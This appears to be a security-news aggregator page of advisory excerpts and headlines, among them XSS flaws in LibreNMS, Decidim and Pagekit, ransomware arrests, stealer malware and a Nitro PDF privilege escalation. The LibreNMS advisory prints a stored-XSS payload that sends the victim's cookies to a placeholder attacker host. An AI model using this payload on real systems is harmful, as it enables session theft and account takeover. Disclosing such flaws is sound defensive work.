Security
Headlines
HeadlinesLatestCVEs

Tag

#web

GHSA-rwwc-2v8q-gc9v: LibreNMS has Stored Cross-site Scripting vulnerability in "Device Dependencies" feature

### Summary A Stored Cross-Site Scripting (XSS) vulnerability in the "Device Dependencies" feature allows authenticated users to inject arbitrary JavaScript through the device name ("hostname" parameter). This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions. ### Details The vulnerability occurs when creating a device within LibreNMS. An attacker can inject arbitrary JavaScript into the hostname parameter. This malicious script is then executed when another user visits the device dependencies page, resulting in an automatic redirect to a website controlled by the attacker. This redirect can be used to steal session cookies or perform other malicious actions. For example, the following payload can be used to exploit the vulnerability: ```t'' autofocus onfocus="document.location='https://<attacker_url>/?c='+document.cookie"``` When the device dependencies page is...

ghsa
Open in Source
#xss#vulnerability#web#git#java#php#oauth#auth
LockBit Associates Arrested, Evil Corp Bigwig Outed

A global operation cuffed four LockBit suspects and offered more details into the org chart of Russia's infamous Evil Corp cybercrime gang.

ICE Signs $2 Million Contract With Spyware Maker Paragon Solutions

US Immigration and Customs Enforcement’s one-year contract with Paragon’s US subsidiary comes amid the Biden administration’s years-long crackdown on commercial spyware vendors.

GHSA-cc4g-m3g7-xmw8: Decidim has a cross-site scripting vulnerability in the version control page

### Impact The version control feature used in resources is subject to potential cross-site scripting (XSS) attack through a malformed URL. ### Workarounds Not available ### References OWASP ASVS v4.0.3-5.1.3 ### Credits This issue was discovered in a security audit organized by [Open Source Politics](https://opensourcepolitics.eu/) against Decidim done during July 2025.

Building Your First Web Application with Yii Framework

Did you know that over 80% of web applications fail due to poor planning and execution? Now imagine…

Cyberattackers Use HR Targets to Lay More_Eggs Backdoor

The FIN6 group is the likely culprit behind a spear-phishing campaign that demonstrates a shift in tactics, from targeting job seekers to going after those who hire.

AI-Powered Rhadamanthys Stealer Targets Crypto Wallets with Image Recognition

The threat actors behind the Rhadamanthys information stealer have added new advanced features to the malware, including using artificial intelligence (AI) for optical character recognition (OCR) as part of what's called "Seed Phrase Image Recognition." "This allows Rhadamanthys to extract cryptocurrency wallet seed phrases from images, making it a highly potent threat for anyone dealing in

GHSA-xw32-6422-frqm: Pagekit Cross-site Scripting vulnerability

Pagekit 1.0.18 is vulnerable to Cross Site Scripting (XSS) in index.php/admin/site/widget.

Android users targeted on Facebook and porn sites, served adware

ThreatDown research uncovered a campaign that spreads a annoying adware for Android devices through several methods

Nitro PDF Pro Local Privilege Escalation

The Nitro PDF Pro application uses a .msi installer file (embedded into an executable .exe installer file) for installation. The MSI installer uses custom actions in repair mode in an unsafe way. Attackers with low-privileged system access to a Windows system where Nitro PDF Pro is installed, can exploit the cached MSI installer's custom actions to effectively escalate privileges and get a command prompt running in context of NT AUTHORITY\SYSTEM. Versions prior to 14.26.1.0 and 13.70.8.82 and affected.